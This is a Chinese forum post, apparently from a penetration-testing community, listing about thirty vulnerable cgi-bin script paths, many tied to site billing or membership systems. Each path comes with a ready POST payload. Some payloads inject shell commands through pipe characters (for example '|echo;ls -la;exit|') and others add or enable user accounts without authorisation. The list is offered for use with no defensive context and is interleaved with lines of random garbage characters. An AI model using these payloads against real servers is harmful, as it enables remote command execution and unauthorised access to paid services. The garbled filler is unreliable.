中国网络渗透测试联盟
标题:
Cgi-bin 30个漏洞+使用方法
[打印本页]
作者:
admin
时间:
2012-9-13 16:55
标题:
Cgi-bin 30个漏洞+使用方法
==============================
6 Y: d3 m: e4 O
% v- b! f4 U( \# ]# C
/smspass.pl
5 Q- t- K U# L, H* j9 |
username=username&password=password
: K" H0 B/ P, A5 D, c! v0 X2 M
9 n2 R- L+ c$ T2 {' O5 h
/index.cgi
% t. S# D6 ~1 _; \: ~& f z
wei=ren&gen=command
9 e! `. m. w: s
4 D R5 Q& b, f0 `
/passmaster.cgi
9 H8 X4 k" h! }3 L
Action=Add&Username=Username&Password=Password
& c' x4 D! @1 ^0 \9 d) o" r9 u1 W* N
# j( N' {: s4 Y5 d) B
/accountcreate.cgi
5 W! r& E6 Z5 h& @" l# o/ v
username=username&password=password&ref1=|echo;ls|
3 W, b; K Z3 v" z, ]! \( w% y% N. D
( {- M& q1 N4 t9 z5 `6 M/ C$ L
/form.cgi
8 A8 g+ W+ ^: o. ?) ^, R
name=xxxx&email=email&subject=xxxx&response=|echo;ls|
) O" F% m& L( _% w$ d8 g
8 S0 N0 O& B. k% J* d$ {, Y- M: v
/addusr.pl
* L R4 [7 z% R5 Z; Z
/cgi-bin/EuroDebit/addusr.pl
# L- h7 p9 N! d# k. ^
user=username&pass=Password&confirm=Password
3 q: b5 c+ ^7 S0 k- m
. N1 E9 F* q6 m- g/ b. }
/ccbill-local.asp
% u+ O' `3 \, I0 g4 z) k
post_values=username:password
5 n) K% d- M! |3 n
8 b8 U% Y+ m" b* j% x4 ]
/count.cgi
, h+ _: r; G( l! M; l" d6 X3 r
pinfile=|echo;ls -la;exit|
, B6 h1 C' N: F: }! G
. E7 W. M2 X8 V+ ^, \
/recon.cgi
* ^/ k. x- r. h
/recon.cgi?search
H. y( b1 |- O) j/ y; x
searchoption=1&searchfor=|echo;ls -al;exit|
8 T1 n( n4 d& X+ S
0 ~3 o4 D* }2 \
/verotelrum.pl
7 i4 }$ H6 D1 _
vercode=username:password:dseegsow:add:amount<&30>
9 y2 ~0 G! T$ T7 k$ r! Y6 _. K
5 i. t' w |* |6 A
/af.cgi
" K( G( P$ V' i! h2 Z% d+ n* `
_browser_out=|echo;ls -la;exit;|
& z" t4 V$ t s: V% ]! u! D
, o3 Z$ J) N, P/ {0 }
/modify.cgi
( y/ {$ r, Z7 h. x) H
username=username&password=password&expire=30
3 T+ G! T( }9 A5 Z6 N" x1 Z. h& h8 s) k
: D4 U* O! e+ z7 q; j* {2 q
/openjournal.cgi
; [+ w6 K! f- l% N+ Q
edit=1&ct=2&go=|echo;ls -al;exit|
( ]. K* a1 v/ p; n6 P
. c) c! }" `3 e6 d1 Y* C
/gx9passwd.cgi
9 z. n$ Q5 W o3 z" g: b6 K* v
cmd=ADD&user=username&pass=password
' V5 o) c$ |, A# n
0 d8 H; {! u7 O% D. A% ^: m A& i
/probecontrol.cgi
0 F0 A3 N2 }# T3 J ^
command=enable&username=username&password=password
6 ]2 E" O3 R0 C) Z' s
2 H9 m6 J4 V/ |* _3 s
/recon.cgi
6 X S% L1 u: X: F3 Q
searchoption=3&searchfor=echo;ls -la;exit
2 L: f1 k) a% S5 |" t- N
/ _5 g, C6 f/ T. R
/htadd.pl
* u6 k& O# [+ S0 F# X8 u8 e) m9 V+ G
configfile=|echo; ls -alt; exit
% F7 s) g# f9 Q, H/ o9 C
J/ G, b1 \, J/ z; f" X5 s
/gx9passwd.cgi
* B- F8 V$ _ [9 A! j- ~ v
cmd=ADD&user=username&pass=password
" p2 n5 j( T& N3 j$ y- V9 H
. v& ] T6 t, r, c r" }- B! s: c: ]
/ibill*.pl
/ E( a/ |6 F! E3 W7 ^
reqtype=add&authpwd=authpwd&username=username&password=password
& L4 ^7 D; U" o. c0 H' u; C+ v1 D
G0 }# w: g9 e q7 \
/cpay.cgi
! U y& D/ @/ | s
command=add_member&username=username(EMAIL)&password=password(DES)
6 g! Y9 Q: Y4 O8 E
. J' c. r; T9 W1 i4 v2 z
/globill_ut.cgi
* d! W4 K; ]! e
do=add&username=username&password=password&wpassword=password
! X% E1 @: t6 u8 c! [
( d: l. N1 A1 n
/usercontrol.cgi
! B6 V# J7 q3 l6 L6 H
command=enable&username=USER&password=PASS
: V1 ]$ D z- S
1 k1 s( [9 A; A6 ]1 \! T
/globoSALErum.cgi
/ P/ t: Z0 b5 o
action=ADD&seccode=seccode&login=username&password=password
1 h% ]1 j5 P" x' I
+ g( D. U* [4 g/ Q7 M" g* l$ q) E
/addusr.pl
8 ^: ]8 Z; V& f* l; ~; m a. \% F: e
user=USER&pass=PASS&confirm=PASS
* u' y9 N/ S$ c+ \. n2 V$ V
+ B; S7 d# N% K% s1 j; ]; @+ {
/pincount.cgi
. F( h+ f9 q% W4 l3 O3 c7 p; f3 O( I; q
/cgi-bin/mastergate/pincount.cgi
9 H+ J/ P! b7 U7 i% c r- ^- ~& V* w- Z
pinfile=|echo;pwd;exit|
9 E5 c2 Z( `* f/ K2 S2 ?* Y
! K" q0 U5 [ ^/ p8 }
/accountcreate.cgi
, x3 V8 J% H* E4 W0 y. j+ K7 g1 P
/cgi-bin/gateway/accountcreate.cgi
/ r/ q5 |' i1 @2 }; W& f6 }0 n. G
username=username&password=password&password2=password&ref1=|echo;ls -al;exit
# x+ p, p; L+ ~5 [' a# k) H
+ x/ h& h# z' ?# \2 Q8 K
/af.cgi
# \5 ~# X0 Y2 l8 z
/env.cgi
$ Z4 A T+ A2 ^( J6 e
ADD+;echo;pwd;exit
- e# E" e" o& m9 v2 b6 z; \0 m" f* a
. b, M% |- ?; y+ X8 o
/count.cgi
8 x0 y4 G5 E* p
pinfile=|echo;pwd;exit|
# T' N& d9 k9 G7 z$ S
0 G# b: p$ m; p5 D
/recon.cgi
0 f9 |# J$ ?+ U5 M
searchoption=1&searchfor=|echo;ls%20-al;exit|
& o& h( @2 J& w/ n' |8 {# p0 s
; B0 M) p1 y( M5 q1 w
/add.cgi
* l. `7 H, H/ _7 k! Z. |( g
username=username&password=password&expire=30
. P1 }. q/ Z+ B: d2 W1 g3 Y& y
8 \, a7 ^% Y3 p9 V) m
==============================
+ j+ {1 f3 _* J. w, `
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2